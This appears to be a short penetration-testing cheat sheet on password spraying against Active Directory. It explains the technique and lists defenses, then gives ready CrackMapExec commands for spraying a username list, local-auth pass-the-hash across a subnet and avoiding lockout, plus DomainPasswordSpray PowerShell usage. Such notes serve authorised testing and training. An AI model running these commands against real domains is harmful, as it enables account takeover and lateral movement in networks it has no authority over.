Password Spraying

Password spraying is an attack where an adversary attempts to authenticate against multiple AD user accounts by cycling through a small set of commonly used passwords (e.g., "Spring2024!").

Unlike brute-force attacks that repeatedly target a single account, password spraying spreads attempts across many accounts to evade account lockout policies. Attackers often use tools like Rubeus, CrackMapExec, or Kerbrute to automate authentication attempts against AD services such as Kerberos (TGT requests), NTLM, LDAP, and web-based portals. If successful, an attacker can gain initial access, move laterally, or escalate privileges within the domain.

Defenses include enforcing strong password policies, enabling smart lockout policies, monitoring failed logins via Event ID 4625, implementing Azure AD Identity Protection, and enforcing multi-factor authentication (MFA) for all external-facing services.


Password Policy

Since password spraying for valid domain credentials may lock out active accounts in the environment, we need to be precise when selecting a password to spray. To achieve this, we can enumerate the password policy for the environment. The following page explains how to do so:


Linux

# Domain Joined
sudo crackmapexec smb 10.10.10.10 -u usernamelist.txt -p Password123@

# We can grep for '+' to find valid ones.

# Local Account
sudo crackmapexec smb --local-auth 192.168.5.0/24 -u administrator -H <HASH>

# NOTE: --local-auth will prevent account lockout, so always use it when
# playing with admin accounts.

Windows

# https://github.com/dafthack/DomainPasswordSpray

# Import (either of the following)
. .\DomainPasswordSpray.ps1
Import-Module ./DomainPasswordSpray.ps1

# Execute
Invoke-DomainPasswordSpray -Password Password123 -OutFile success -ErrorAction SilentlyContinue